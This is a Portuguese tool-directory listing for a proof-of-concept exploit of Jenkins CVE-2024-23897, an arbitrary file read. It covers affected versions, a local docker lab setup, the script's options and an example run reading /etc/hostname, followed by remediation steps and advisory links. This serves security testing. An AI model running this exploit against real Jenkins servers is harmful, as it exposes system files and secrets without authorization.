Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Jenkins-CVE-2024-23897 — PoC para Jenkins CVE-2024-23897 | Kitploit
Ferramentas/GitHubGitHub/abraxa5/jenkins-cve-2024-23897
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoRed Teaming
GitHubabraxa5/jenkins-cve-2024-23897

Jenkins-CVE-2024-23897

PoC para Jenkins CVE-2024-23897

Ver Repositório
11há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Site

PoC do CVE-2024-23897 Jenkins

Um proof-of-concept (PoC) para o CVE-2024-23897, uma vulnerabilidade de leitura arbitrária de arquivos na interface de linha de comando (CLI) embutida do Jenkins. Permite que atacantes não autenticados com permissão Overall/Read leiam arquivos arbitrários no sistema de arquivos do controlador Jenkins.

Versões Afetadas

  • Versões do Jenkins <= 2.441
  • Versões LTS do Jenkins <= 2.426.2

Configurar uma instância vulnerável

Inicie uma instância vulnerável local usando docker compose:

root@kitploit:~
cd docker
docker compose up -d

A instância estará disponível em http://localhost:1234

Exploração

root@kitploit:~
❯ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]

Jenkins CVE-2024-23897 file-read PoC

options:
  -h, --help        show this help message and exit
  --url URL         URL for Jenkins instance (default: http://localhost:1234)
  --file FILE       File to read (default: /etc/hostname)
  --method {1,2,3}  The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)

Exemplo

root@kitploit:~
❯ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...


ERROR: No such agent "jenkins_vuln_instance" exists.

[i] Upload request done
[i] All threads completed

O script pode ter problemas ao ler arquivos maiores devido à concorrência e timeouts de conexão. Para mais detalhes técnicos e um passo a passo da vulnerabilidade, dê uma olhada no meu post no blog sobre o tópico.

Correção

  • Atualize para Jenkins 2.442 ou LTS 2.426.3
  • Aplique soluções temporárias conforme descrito no comunicado de segurança do Jenkins.

Links Relacionados

  • Sonar Source | Expansão Excessiva: Revelando Vulnerabilidades Críticas de Segurança no Jenkins
  • Comunicado de Segurança do Jenkins - 2024-01-24
  • Qualys ThreatPROTECT | Vulnerabilidade de Execução Remota de Código no Jenkins Core (CVE-2024-23897)
  • CVE-2024-23897: Avaliando o Impacto da Vulnerabilidade de Vazamento Arbitrário de Arquivos do Jenkins – Horizon3.ai
Baixar ferramenta